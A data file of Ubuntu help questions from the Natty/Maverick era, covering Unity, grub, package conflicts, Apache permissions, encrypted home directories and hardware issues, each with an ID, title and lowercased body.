36433	can i use the unity launcher icon to minimize applications/windows ?	i do n't know if this is a feature or a bug , but clicking on an active application 's launcher icon does n't minimize it . it is terribly inconvenient for folks using a persistent unity bar to click minimize button every time . is there any way to add minimize functionality to the launchers ?
36434	how can i remove duplicate icons for `` launched '' java programs in the launcher ?	when launching java programs ( like intellij idea and crashplan ) in natty 's unity launcher , duplicate icons are shown ( see image ) . for intellij i created the .desktop file , for crashplan the .desktop file is supplied with the application . is there something that can be changed in the .desktop files ( or somewhere else ) that can prevent this from occurring ? i could n't find a bug report for unity itself but programs like gnome-do/docky have bug reports and had to make internal changes to their applications to prevent this . in this image the 1st icon is the one created from the .desktop file and the second icon is after launching it . second icon disappears when closing the application . custom intellij .desktop file # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_us ] =/opt/idea/bin/idea128.png name [ en_us ] =intellij idea exec=/opt/idea/bin/idea.sh name=intellij idea icon=/opt/idea/bin/idea128.png startupnotify=true crashplan provide .desktop file [ desktop entry ] version=1.0 encoding=utf-8 name=crashplan categories= ; comment=crashplan desktop ui comment [ en_ca ] =crashplan desktop ui exec=/usr/local/crashplan/bin/crashplandesktop icon=/usr/local/crashplan/skin/icon_app_64x64.png hidden=false terminal=false type=application genericname [ en_ca ] =
36438	any synctoy replacement ?	i use synctoy in windows to keep my local files - > backup hdd in sync . is there something like that in ubuntu ?
36439	ubuntu does n't boot after kernel update	after the update to latest kernel ( 2.6.32-31-generic ) , when i start my pc , all i get is the grub2 prompt . i do n't get any errors , it simple wont boot . i tried this https : //help.ubuntu.com/community/grub2 # boot % 20a % 20specific % 20kernel % 20manually but my problem seems to be the /boot on a separate partition and the tutorial does n't cover this part . if i 'll can boot , i suppose i 'll can do a grub-update , but first i need to get in . i have ubuntu 10.04 , but i think this is a grub related question and linux version is irrelevant . please help , thanks !
36443	how can i downgrade python or use many versions ?	i want to use mozilla jetpack & google app engine which supports only up to python 2.6 & 2.5 respectively . so i think i will have to install 2.5 . ubuntu comes with 2.6.6 i think ubuntu 11 comes with 2.7 ? how might i downgrade or install separate python for different usages ? i think i read that its not a good idea to uninstall/downgrade python as ubuntu uses it ? if so how do i fix this ?
36445	switching by hotkeys between workspaces with virtualbox instance	i faced following usability issue : when have one of workspaces with focused virtualbox instance within it , that ca n't switch between workspaces by super+e or by ctrl+alt+arrow . is it possible to solve it ? ( virtualbox is win xp guest edition and kubuntu , host is ubuntu 10.10 )
36446	how to configure terminal window to open on a specific default path ?	at present , each time we open a terminal window we are placed inside our home directory . /home/myuser/ i would like to change that path to be : /home/myuser/public_html/ how can we do that ? thanks .
36448	is there a way to blacklist an individual application from using overlay-scrollbars ?	i am having problems with some programs when using overlay-scrollbars , mainly code : :blocks and eclipse . i 've found several ways of disabling the overlay scrollbars completely , for all applications , but i like them and i do n't want to do this . is there a way to blacklist only this applications from using the new scrollbars ?
36449	is there an upstart event for files systems that get mounted manually ?	there is the mounted event in upstart , but it is emitted only when the mountall daemon mounts the devices found in /etc/fstab at startup . are there any events that get emitted , when i mount a device afterwards manually using the mount command or by calling an api ? if not , what would be a suitable workaround ?
36450	how to set a password for workspaces ?	is it possible to set a password for workspaces ? such that if i switch from one workspace to another it should prompt for password .
36454	how to create bash file and allow it to accept an argument from the terminal ?	in recall for nostalgic feelings , i 've remembered the .bat files on dos . : ) here 's the thing : each time i need to generate a documentation for a given web application i have to : sudo phpdoc -o html : frames : earthli -d public_html/yoursite.dev/application/ -t public_html/yoursite.dev/docs/ is there a way to make a shortcut to the above , so that , we can type only : sudo generatedoc.sh -a yoursite.dev or even better : sudo generatedoc.sh -thevariablethatneedstobechangedonbashhere so that , if we have yoursite.dev passed on the command line , the bash will have yoursite.dev , if we write yoursite2.dev then , the bash would have yoursite2.dev and so on ... any clue ? thanks a lot .
36459	my infopanel screenlet is blinking all the time	installed screenlets and infopanel but it is blinking all the time . is somebody had the same problem and know how to fix it ?
36460	how do i create a standard icon set ?	i am a designer and i have created a few icons . how would i need to package said icons so an end user could install easily and only change the icons i have specified and not mess with any other icons ? if it is important to know -- the launchers in question are libre graphics ( gimp , inkscape , blender , bluefish , scribus , etc . ) it would be best if the method is cross-environment ( works in unity , gnome , kde , etc ) but unity is what i am using so that is the most important to me .
36461	monitor calibration software	i was wondering if there is any software for monitor calibration available for ubuntu ? like the tools they have available for tvs , when you first buy them . i would especially appreciate answers with one click calibration for color , contrast and brightness . i know these are available on the monitors themselves , but i hate clicking around . anything specific for users with nvidia cards ? please and thank you .
36465	installing xfce desktop ( package : xubuntu-desktop ) alongside gnome desktop ( package : ubuntu-desktop ) : ubuntu-desktop breaks	the issue i 'd like to install the xfce interface alongside the gnome interface that comes preinstalled with ubuntu . however , when i try to install the package xubuntu-desktop , i end up with this : [ kahless ] # aptitude install xubuntu-desktop reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done writing extended state information ... done the following packages are broken : ubuntu-desktop the following new packages will be installed : a2ps { a } abiword abiword-common { a } abiword-plugin-grammar { a } abiword-plugin-mathview { a } app-install-data-commercial aumix { a } aumix-common { a } catfish exaile exo-utils { a } fortune-mod { a } fortunes-min { a } gigolo gnumeric gnumeric-common { a } gnumeric-doc { a } gtk2-engines-xfce libabiword-2.8 { a } libaiksaurus-1.2-0c2a { a } libaiksaurus-1.2-data { a } libaiksaurusgtk-1.2-0c2a { a } libexo-0.3-0 { a } libexo-common { a } libgdome2-0 { a } libgdome2-cpp-smart0c2a { a } libgtkmathview0c2a { a } liblink-grammar4 { a } libotr2 { a } libots0 { a } libpsiconv6 { a } librecode0 { a } libscim8c2a { a } libsdl1.2debian-alsa libtagc0 { a } libthunar-vfs-1-2 { a } libwv-1.2-3 { a } libxfce4menu-0.1-0 { a } libxfce4util-bin { a } libxfce4util-common { a } libxfce4util4 { a } libxfcegui4-4 { a } libxfconf-0-2 { a } libxmlrpc-core-c3 { a } link-grammar-dictionaries-en { a } mousepad murrine-themes { a } orage oss-compat { a } pidgin pidgin-data { a } pidgin-libnotify { a } pidgin-otr psutils { a } python-cddb { a } python-mmkeys { a } python-mutagen { a } python-sexy { a } ristretto scim scim-bridge-agent { a } scim-bridge-client-gtk { a } scim-gtk2-immodule { a } scim-modules-socket { a } scim-modules-table { a } scim-tables-additional tango-icon-theme-common thunar thunar-archive-plugin thunar-data { a } thunar-media-tags-plugin thunar-thumbnailers thunar-volman { a } thunderbird ttf-lyx { a } usb-creator xfce-keyboard-shortcuts { a } xfce4-appfinder xfce4-clipman { a } xfce4-clipman-plugin xfce4-cpugraph-plugin xfce4-dict xfce4-fsguard-plugin xfce4-mailwatch-plugin xfce4-mixer xfce4-mount-plugin xfce4-netload-plugin xfce4-notes { a } xfce4-notes-plugin xfce4-panel { a } xfce4-places-plugin xfce4-power-manager xfce4-power-manager-data { a } xfce4-quicklauncher-plugin xfce4-screenshooter xfce4-session xfce4-settings { a } xfce4-smartbookmark-plugin xfce4-systemload-plugin xfce4-terminal xfce4-utils { a } xfce4-verve-plugin xfce4-volumed xfce4-weather-plugin xfce4-xkb-plugin xfconf { a } xfdesktop4 { a } xfdesktop4-data { a } xfprint4 xfswitch-plugin xfwm4 { a } xfwm4-themes { a } xscreensaver xubuntu-artwork { a } xubuntu-default-settings xubuntu-desktop xubuntu-docs xubuntu-gdm-theme { a } xubuntu-icon-theme { a } xubuntu-plymouth-theme { a } xubuntu-wallpapers { a } the following packages will be removed : libsdl1.2debian-pulseaudio { a } xaw3dg { u } 0 packages upgraded , 121 newly installed , 2 to remove and 1 not upgraded . need to get 75.7mb of archives . after unpacking 261mb will be used . the following packages have unmet dependencies : ubuntu-desktop : depends : libsdl1.2debian-pulseaudio but it is not installable the following actions will resolve these dependencies : remove the following packages : ubuntu-desktop leave the following dependencies unresolved : catfish recommends slocate score is -81 accept this solution ? [ y/n/q/ ? ] these lines here worry me the most : remove the following packages : ubuntu-desktop is there a way to install the xfce desktop alongside gnome without causing ubuntu-desktop to break ? more info ( 1 ) using apt-get results in the same issue . more info ( 2 ) attached are the other solutions that aptitude provides : solution 1 was listed above . solution 2 : the following actions will resolve these dependencies : keep the following packages at their current version : libsdl1.2debian-alsa [ not installed ] libsdl1.2debian-pulseaudio [ 1.2.14-4ubuntu1.1 ( lucid-updates , now ) ] leave the following dependencies unresolved : catfish recommends slocate xubuntu-desktop recommends libsdl1.2debian-alsa score is -210 accept this solution ? [ y/n/q/ ? ] solution 3 : the following actions will resolve these dependencies : keep the following packages at their current version : libsdl1.2debian-alsa [ not installed ] downgrade the following packages : libsdl1.2debian [ 1.2.14-4ubuntu1.1 ( lucid-updates , now ) - > 1.2.14-4ubuntu1 ( lucid ) ] libsdl1.2debian-pulseaudio [ 1.2.14-4ubuntu1.1 ( lucid-updates , now ) - > 1.2.14-4ubuntu1 ( lucid ) ] leave the following dependencies unresolved : catfish recommends slocate xubuntu-desktop recommends libsdl1.2debian-alsa score is -220 accept this solution ? [ y/n/q/ ? ]
36471	unity and games do n't work on new thinkpad t420	here 's my setup : lenovo thinkpad t420 , brand new nvidia graphics card 4gb of ram 128gb solid state drive intel core i5 processor given these specs , there 's no reason games and unity should n't be working . the strange thing is that both do work when i run from a live usb , but not when ubuntu is installed to the hard drive . is there something different with the 3d capabilities of running from the computer as opposed to running from the live usb ? edit : some more information : when i log in for the first time when running from the hard drive , ubuntu says `` it seems that you do not have the hardware required to run unity . please choose ubuntu classic at the login screen and you will be using the traditional environment . ''
36474	how does the docky show desktop docklet work	docky has the feature of tiling/cascading the desktop . i 'd like to know what it taps into to acheive this , and if i could get similar functionality in unity without docky
36476	how can bind the compiz scale plugin to the corner of my window ?	i go to compizconfig - > scale windows - > binding and then choose `` initiate window picker '' with the mouse icon next to it . i check `` enabled '' . then i highlight the corners in green . this does n't seem to work ... part of the problem might be that i must choose a button ( there is no way to make that button choice blank ) . before i upgraded to 11.4 this was no problem but now i 'm stuck .
36478	problem installing r	i recently removed my windows partition and am now running just ubuntu 10.10 i wanted to reinstall the latest version of r , but i some weird error messages . i 'm using the instruction on their website to install : http : //cran.r-project.org/bin/linux/ubuntu/ ~ $ deb http : //cran.wustl.edu/bin/linux/ubuntu maverick/ no command 'deb ' found , did you mean : command 'debc ' from package 'devscripts ' ( main ) command 'derb ' from package 'libicu-dev ' ( main ) command 'dab ' from package 'bsdgames ' ( universe ) command 'debi ' from package 'devscripts ' ( main ) command 'xdeb ' from package 'xdeb ' ( universe ) deb : command not found what 's going on ? help ? ! when i reinstalled ubuntu and removed the windows partition , the ubuntu terminal had a message at the start of the terminal . this did n't happen earlier when i was dual booting . to run a command as administrator ( user `` root '' ) , use `` sudo < command > '' . see `` man sudo_root '' for details .
36479	no terminal in applications menu	i have recently bought a dedicated server , which is running ubuntu 10.4 , but there is no terminal in the applications or in system . how do i add it for easy access ( i 'm new to linux ) .
36483	how to change the application to open pdf file in firefox	in firefox , when i clicked a pdf file in website , i would be asked to download the pdf file or open the pdf file in evince running outside firefox . since i install adobe reader , whenever i clicked a pdf link , the pdf will be opened in it running inside firefox . i feel it is now running more slowly than before . is it possible to change which application to open pdf from within firefox ? thanks and regards !
36484	how do i add a software source ?	sometimes i see sites offering ubuntu packages via something like add this line to your software sources : deb http : // something something how can i add these to my package manager so i can install the software and keep it up to date ? i 'd like both gui and command line options .
36485	what is saved when you upgrade and should you upgrade or wipe clean the disk ?	i have used 10.10 as long as i have used ubuntu and i have not upgraded yet . i have tons of files and applications on this computer and i really do n't want to have to reinstall them and copy them . will all of my applications and settings be saved by and upgrade and will all of my files be saved and carry over to the new version ? also is it really worth it to upgrade or should i really just wipe clean with a fresh installation . even if you think i should wipe clean i would like too know whether or not i my files would be saved and my applications and settings would be saved . thank you .
36489	what 's the best , most compatible sub- $ 100 graphics card for natty ?	since upgrading to natty graphic performance has been absolutely terrible despite having decent system specs . i 'm willing to buy a new card if it will make the interface fast again . can someone suggest a card that will perform well and be totally compatible out of the box with natty ?
36494	how to add vpn connections while using connman	i was trying out connman yesterday . my wireless internet connected fine , however , i was not able to find any option for vpns . is there not option to connect to vpns through connman gui ? the website says , it supports vpn .
36501	how to convert and translate html file with kde lokalize ?	to what format and how can i convert html file in order to translate it with lokalize application ?
36504	what accounts for the smaller size of open source apps ?	i 'm new to ubuntu and i 'm amazed that open source alternatives to my windows apps like gimp , amarok , libreoffice , cheese etc are so much smaller than their windows compatriots ( ms office , photoshop , youcam etc ) . ubuntu has to be the best evolution ever ! and the best after all these is that it 's completely free
36507	how do i import a public key ?	when i ran an update , i get the following error . gpg error : http : //cran.wustl.edu maverick/ release : the following signatures could n't be verified because the public key is not available : no_pubkey 51716619e084dab9 therefore , i ran the following code and get the following error message : $ gpg -- keyserver subkeys.pgp.net -- recv 51716619e084dab9 gpg : requesting key e084dab9 from hkp server subkeys.pgp.net gpg : key e084dab9 : `` michael rutter < marutter @ gmail.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1 how do i set a public key that works ? or what can i do to fix this problem ?
36512	right-clicking on the unity desktop does nothing - ideas ?	i was reading today the latest canonical design blog post where i was kind of surprised that one should be able to right click on the desktop to change the wallpaper . i am running the most updated version of natty and have the latest unity package installed ( 3.8.10 ) but right clicking on the desktop brings nothing on my machine . on the other hand , when i right click on any launcher icon i do get a quick list , so i know it 's not a problem with my mouse or something . is this a known bug ? i tried to kill nautilus as nathan suggested using alt+f2 and then killall nautilus . just to be sure , i then opened a terminal window and typed the same command again . got the response nautilus : no process found ( i figured that my first try to kill nautilus worked then . just to be on the safe side , i clicked the `` home '' icon on my launcher to start nautilus , and then killed it again ( same command ) . still nothing happened . following some of the comments below , i should specify that i do have ubuntu-desktop installed ( and updated version 1.220 ) and nautilus is indeed installed ( version : 1:2.32.2.1-0ubuntu13 ) . ( used to have nautilus from the elementary ppa , but removed it following the comments below - still no luck ) .
36515	choosing gdm login window theme via gui without ubuntu tweak	is there any way to ( via the gui ) modify the theme that is used for the gdm login system ? i ask because when i installed xubuntu-desktop alongside gnome-desktop the xubuntu-gdm-theme package took over the login window theme . is there any easy method to have multiple gdm themes installed at once , but be able to choose which theme takes dominance in the login manager without removing all other theme packages ?
36517	ubuntu tells me i have packages to upgrade when i do n't	i have a server machine that i never log into the x display on , only via ssh . recently i logged in and it told me i had 12 packages can be updated . 6 updates are security updates . i actually already knew that because i run munin on it and all my other servers . so anyway , i did `` sudo aptitude '' and installed all the updates , then rebooted . a few days later , munin told me i needed to upgrade another package , so i logged on , but the login message said : 12 packages can be updated . 6 updates are security updates . i went into aptitude and installed the one update . ubuntu is still telling me i have 12 packages to update . munin tells i do n't have any . i tried aptitude -d -y dist-upgrade and apt-get -d -y dist-upgrade and both of them tell me there is nothing to install . so why is the login information still telling me i have 12 packages to update ?
36520	how could i begin c++ programming on ubuntu ?	i recently switched to ubuntu from windows 7 . i was previously learning c++ with microsoft 's ide , visual studio . how would i go about programming c++ on ubuntu , preferably with an ide ?
36523	creating a fortunes file	how can i create a fortunes file and add it to the fortune* command on the shell ? *fortune - `` console command to print a random , hopefully interesting , adage . ''
36526	how to close applications by middle clicking on the title bar ?	in metacity i want to be able to middle click on the title bar and close it . i tried going into gconf-editor and changing the action-middle-click-titlebar value to `` close '' , but it does nothing . second thing i want is to change the way the unity bar on the top reacts , but i 'm not sure where i would go to do such a thing . stuff i want to do include making it so i do n't have to hover over the application name on the unity bar to see the tools , perhaps removing the application name all together , and remove the close , minimize , and maximize buttons which are to me just visually obstructive . thanks .
36530	ide drive wo n't mount	i have an internal ide drive that i 'm trying to mount . clicking `` mount volume '' in the disc utility gives me this : error mounting volume an error occurred while performing an operation on `` beowulf '' ( partition 1 of ata maxtor 6y200p0 ) : the operation failed it then gives these details : error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sdb1 is already mounted on / mount failed here is the contents of my mtab : /dev/sdb1 / ext4 rw , errors=remount-ro , commit=0 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/brenton/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=brenton 0 0 here is the contents of fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=87486d4a-aad3-4314-8d33-2ed4299985fa none swap sw 0 0
36533	allowing apache access to a subdirectory in a home directory without access to the home directory	i am running ubuntu 11.04 desktop with encrypted home directories . i do development work on my computer and i want to have my webroot directory to be within my home directory so it is encrypted with the rest of my home directory . as i am the only use of the machine , i want to configure apache to point to this directly . current i have changed the /var/www folder into a symbolic link to the workspace in my hone dir : /home/valorin/workspace however , this throws 403 forbidden errors in apache . i have added my user into the www-data group , and set the ownership & permissions on the workspace folder : drwxrwxr-x 2 valorin www-data 4096 2011-04-23 10:02 workspace but the only way i can get it to work is to change my home dir group to be www-data and set permissions too . i do n't really want to do this as it means apache has access to my home dir and could possibly be used by someone on my network to get into my personal data . does anyone know how i can solve this problem ?
36536	runs ok in 10.10 , screen flickers continuously like neon light in 11.04	i have an alienware m17x r3 laptop with 460m nvidia card . i just got it brand new from alienware today . running nvidia driver does n't work in 10.10 ( gdm does n't load at all ) , so i switch back to nouveau driver and upgrade to 11.04 . once the upgrade finishes , when the computer boots up ( after grub ) , the screen will continuously flickers like color-changing neon light . is my computer not ubuntu-compatible ?
36537	how to hide google desktop icon on gnome ?	it is near the upper left corner . i do n't need the icon there . how to hide it ?
36544	is there anyway i can play a video on login	i have this video clip that i want ubuntu to play when i login , is there a way of doing this ?
36545	why is n't itunes working for me ?	i know you are to install itunes in wine but when ever i open it an error message appears that says apple application support was not found . apple application support is required to run itunes . please uninstall itunes , then install itunes again . error 2 ( windows error 2 ) i have tried uninstalling the itunes , re downloading it and repairing it . nothing seems to work . please help me here . thank you .
36548	how can i adjust the brightness of my webcam ?	i have a problem recently my cam ( built in ) is really really dark when using skype or cheese i can barely see anything , only when i spot a light on the cam i can see it but really dark i have a sony vaio f127fd , i am running ubuntu 10.10 ( desktop edition ) fully updated note : the webcam was fine i guess the problem has something to do with the latest updates
36549	unity dual monitor wallpaper corruption	i am running 11.04 . i have a nvidia geforce gt 240 with a dual monitor setup and am running the proprietary drivers . each time i login , i get a weird problem . the left monitor has a corrupted background . it appears that the region where the app menu would reside is at a different zoom level than the rest of the screen . if i do anything to cause occlusion on that part of the screen the background redraws and everything looks ok. has anyone else experienced this problem ?
36551	is there an equivalent to fireshot for firefox ?	on windows , i can use fireshot with firefox to take screenshots , ufortuately , its works only on windows ... how can i do the same on ubuntu ? the main features i will need are : take full scrolling web page screenshot work with flash/silverlight content - some screen capture will display these as black boxes or something if possible , have an api so i can develop scripts to make use of it
36552	how to escape this in the bash script ?	i 'm trying to complete a batch of 3 videos to leave it there till morning processing but it seems there are special characters in it ... i try it `` raw '' in the terminal and it works but in bash script it stops working example : args1= '' -r 29.97 -t 00:13:30 -vsync 0 -vpre libx264-medium -i '' args12= '' -r 29.97 -ss 00:40:30 -vsync 0 -vpre libx264-medium -i '' args2= '' [ in ] scale=580:380 [ t1 ] , [ t1 ] pad=720:530:0:50 ( other arguments with lots of [ and ] '' in the output it says unable to find a suitable output format for 'scale=580:380 ' not sure why ... like i said , the command runs fine in the command-line , just not in the script /usr/local/bin/ffmpeg `` $ args1 '' `` $ { file } '' -vf `` $ args2 '' `` $ args3 '' `` $ { args [ 0 ] } _ $ { startingfrom } _0001_02.mp4 ''
36553	can i disable monitor dimming/screen saver when playing videos ? vlc/web ( html5/flash/silverlight/quicktime )	is it possble to disable monitor dimming/screensaver only on video playback ? for me , videos will be mainly desktop via vlc or web via firefox/chrome ( html5/flash/silverlight/quicktime )
36564	how do i run bleachbit from the terminal ?	on their website , they say to simply enter bleachbit -- ( argument here ) but all that does is open the program . am i doing something wrong ?
36572	firefox cookies not being saved	i 'm running the latest natty beta and i 've realized that cookies are not saving under firefox . passwords and history save normally , but cookies do not . i have check the settings in firefox and it is set to save history . this becomes a problem because i am using two-step authentication for google so every time i close a window i need to check my phone for a new code . also strange is that every time if i ever mistype my password entering google ( on the first bad type ) they give me a captcha box to fill in . these irregularities do not happen under win xp sp3 .
36573	trying to mount old encrypted home	i installed a fresh ubuntu 10.10 onto a new hard drive and want to mount the old home directory to a subdirectory of my new ( also encrypted ) home directory . i tried this with sudo mount -t ecryptfs /mnt/oldhome/me/ /home/me/oldhome , with /mnt/oldhome being the /home partition of the old system . afterwards ~/oldhome contains a desktop link file ( access-your-private-data.desktop ) linking to ecryptfs-mount-private and a readme.txt saying i should run ecryptfs-mount-private . i do so , but as i do n't know what is supposed to happen , i ca n't tell if it happens and if it brings me closer to accessing my old home . any hints ? update i was able to mount my old encrypted home with the help of this script . though , looking into it with ls , i get alot of errors like this : ls : can not access /mnt/oldme/some_file : no such file or directory other information ls -l should show , is replaced by question marks . update 2 i mounted the old system to /mnt/oldroot and mount /dev , /sys , /proc and the old home partition into . then i chrooted into /mnt/oldroot , su - me and ecryptfs-mount-private . asked for the passphrase i put it in and got : error : unwrapping passphrase and inserting into the user session keyring failed [ -5 ] info : check the system log for more information from libecryptfs error : your passphrase is incorrect ecryptfs-unwrap-passphrase gives me the exact same passphrase i used , though .
36574	freeze at startup : `` it seems that you do not have the hardware required to run ubuntu ''	just after an update from ubuntu 10.10 to 11.04 and a restart , ubuntu freeze at startup on a dialog saying : `` it seems that you do not have the hardware required to run unity . please choose ubuntu classic '' , etc . i can not click the `` close '' button . i can not switch either to another tty . any idea how to figure out what happen ?
36575	this flash plugin was blocked because it is out of date	i being a developer want to use flash version 10.1 or older on some of my ubuntu machines . the problem is each time i run google chrome on this lucid 64 bit machine ( which is the only machine with me ) i get a warning : this flash plugin was blocked because it is out of date as per instructions on these links : http : //www.chromium.org/developers/how-tos/run-chromium-with-flags http : //peter.sh/experiments/chromium-command-line-switches/ then i tried at a command line : google-chrome -- allow-outdated-plugins but i still got the same warning . is there a way i can use with an old version of flash plugin ? update 1 as per below suggestion i edited the hex value of one of the file /usr/lib/firefox/plugins/flashplugin-alternative.so /usr/lib/iceape/plugins/flashplugin-alternative.so /usr/lib/libvisual-0.4/morph/morph_flash.so /usr/lib/openoffice/basis3.2/program/libflashlx.so /usr/lib/xulrunner/plugins/flashplugin-alternative.so /usr/lib/flashplugin-installer/libflashplayer.so /usr/lib/midbrowser/plugins/flashplugin-alternative.so /usr/lib/xulrunner-addons/plugins/flashplugin-alternative.so /usr/lib/mozilla/plugins/flashplugin-alternative.so /usr/lib/iceweasel/plugins/flashplugin-alternative.so /usr/share/ubufox/plugins/npwrapper.libflashplayer.so /var/lib/flashplugin-installer/npwrapper.libflashplayer.so which was /usr/lib/flashplugin-installer/libflashplayer.so from 10.1 to 10.2 but there was no effect.how do i find out which file is google-chrome using from above ? update 2 following from lsof output i found var/lib/flashplugin-installer/npwrapper.libflashplayer.so is the flash plugin which google chrome is using and there i could not find the string flash 10.1 as mentioned in reply below .
36577	is there a program like microsoft paint ?	greetings , i 'm slowly getting used to ubuntu ; for i 've been a windows user as long as i 've used any computer . i 'm hoping someone can suggest a good graphics software . i 'm simply looking for one that works close to microsoft paint . does ubuntu offer anything like it ?
36578	wacom bamboo pen & touch not working after installing doctormo 's ppa	yesterday i installed doctormo 's ppa package of the wacom drivers to get a new wacom bamboo pen & touch working on my ubuntu 10.04 lts laptop , as instructed here and dozens of other web pages . things were working fine , but today things broke . some symptoms : right-/middle-clicks do n't work xsetwacom list devices shows nothing/is empty clicking causes the mouse pointer to stop moving - it moves again if i move the stylus out of the field and back in some extra info : $ uname -a linux fl 2.6.32-31-generic # 61-ubuntu smp fri apr 8 18:25:51 utc 2011 x86_64 gnu/linux $ lsusb bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 004 : id 056a:00d1 wacom co. , ltd bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub $ lsmod | fgrep wacom wacom 32165 0 any ideas ? thanks in advance . happy to provide further info .
36585	wine or virtual machine ( virtualbox ) to run apps ( eg . photoshop )	i am wondering if it will be better ( stability , convenience and speed ) to run apps like photoshop with wine or a virtual machine like virtualbox ?
36597	removing a package broke gnome-panel , how do i get it back ?	i have ubuntu 10.10 and i remove nspr4 package from synaptic ( wrong ! ) . after that gnome-panel is disabled and i lost internet connection . i install libnspr-dev and libnsrp . but there are no gnome-panel . do i need install gnome-panel ?
36601	what to use to annotate pdf ( highlight/underline )	in windows , i can use foxit but on ubuntu x64 , what can i use ? foxit seem to only provide a i386 version
36607	how to move windows between workspaces using the mouse ?	from a so question i found out that ctrl + shift + alt + arrow can move windows to another workspace . is there a way of doing that with the mouse ?
36608	ufw firewall still blocking smb despite adding rules	i have an ubuntu pc with ufw firewall ( gui version ) . i have added the preset samba service , in and out , and even tried adding the ports manually ( 135-139 , 445 , udp and tcp , in and out ) , but it still blocks samba . i am trying to access a share on another pc on my lan . if i disable ufw , it works fine . it must be still blocking something and i ca n't figure it out . any ideas ? i 'm on ubuntu 11.04 beta 2 .
36609	how to put the windows close button on the right ?	i 'm used to the close button in the upper right corner as in ms windows . how to put it there ?
36612	how to move windows around and between screens ?	on ms windows we can use super + arrow to move a window to the right and the left of the screen , maximize , minimize and even move it to another screen . is there a way to configure this feature on unity ?
36616	how to move windows around and between monitors , using keyboard short cuts ?	on ms windows we can use super + arrow to move a window to the right and the left of the screen , maximize , minimize and even move it to another screen . is there a way to configure this feature on gnome ?
36619	can not enable desktop effects on an hp dv2000	i have a laptop hp dv2000 . i recently install ubuntu 10.10 . i also install the compiz fusion and update desktop effects could not be enabled . when i change the preference appearance visual effect it shows `` desktop effects could not be enabled '' this message . how can i resolve this problem ?
36621	extract icon from mono executable	i am running mono executables from the launch panel in gnome , but i ca n't set the right icon . how to do that ?
36622	why pressing the left arrow key in monodevelop 's code editor panel changes the panel focus instead of moving the cursor ?	that behavior is so wrong . the arrow keys should move the cursor , not the panel focus . how to fix it ?
36624	commands to do things like alt-tab	are there commands to preform actions such as alt-tab ?
36626	what is a good system/hardware utility ?	i want some new memory for my computer and i ca n't find out what type of memory my computer uses and needs . when i was using windows i used belarc to find out what hardware was on the computer . now that i am using ubuntu i am not sure what to use . i also used glary utilities . can anyone help me ? thank you .
36630	how to record the terminal on a server ?	i enjoy recording screencasts in my spare time , and was hoping to get going recording some ubuntu stuff . i have a machine running ubuntu server , is there any easy way to record the screen ?
36631	what is the current frequency of my processor ( cpu-z equivalent ) ?	is there a ubuntu program like cpu-z which will show me the actual frequency of my processor ? i do a fair amount of scientific computing which leads to me running my programs for up to 10 hrs . to alleviate this problem a little i overclock my cpu . however i ca n't see what the actual clock of my processor from within ubuntu which means i either have to restart and look at the bios or load into windows . if there was an applet or command line command to find out this information it would be very helpful . thanks for your help
36634	how can i use digikam instead of shotwell in the dash ?	how can i use digikam instead of shotwell in the dash ? i can not choose my preferred photo app in the `` preferred applications '' dialog .
36639	gvfsd-dav process	what is the process gvfsd-dav . the best i could find on my system monitor was that it is somehow associated to nautilus . i closed all the nautilus instances and still there are 2 instances of gvfsd-dav that are completely occupying 2 out of 4 cpus .
36640	where can i get python-gtkhtml2 ?	i am trying to install ultamatix and it says i need python-gtkhtml2 and it is n't in the software center and it was n't found in a search in terminal ( sudo apt-get install python-gtkhtml2 ) . how can i find this package without downloading it from the internet with a virus ?
36643	how make shotwell scan only specific folder ?	shotwell has an option `` watch library directory for new files '' . i have all photos in one folder with subdirectories . so i would like shotwell to scan for new files only this specific folder . instead of this every time it starts it scans all the folders on my system and imports bunch of pictures which i definitely do n't wan na see in shotwell database . is it possible to somehow point shotwell what exactly i want it to scan ?
36647	touchpad worked during install , but not now . fixed it temporarily ( one boot ) , but not working again	just installed a fresh version of natty . my ubuntu worked during install , but not after it boots up after that . i had this issue with meerkat ( on this same machine ) as well . it worked during install and a few times after it . i have my suspicions that an update to xorg was the culprit . i used this solution , which left me with a touchpad that was detected as a generic mouse , and therefore provided no scrolling options . this time around , i tried this solution where i modified a line in /etc/default/grub/ . i 've edited the line grub_cmdline_linux=” “ to grub_cmdline_linux=”i8042.nopnp” and ran : sudo update-grub i rebooted and the touchpad worked work , once ... even configured my circular scrolling . after another restart , i was back to square one . any ideas ?
36654	how do i turn on and off compositing from the command line ?	as the question says : how can i turn on/off compositing ( like clicking the appropriate option in system→ preferences→ appearance→ visual effects ) using the command-line ? i run ubuntu desktop 10.10 , if that helps .
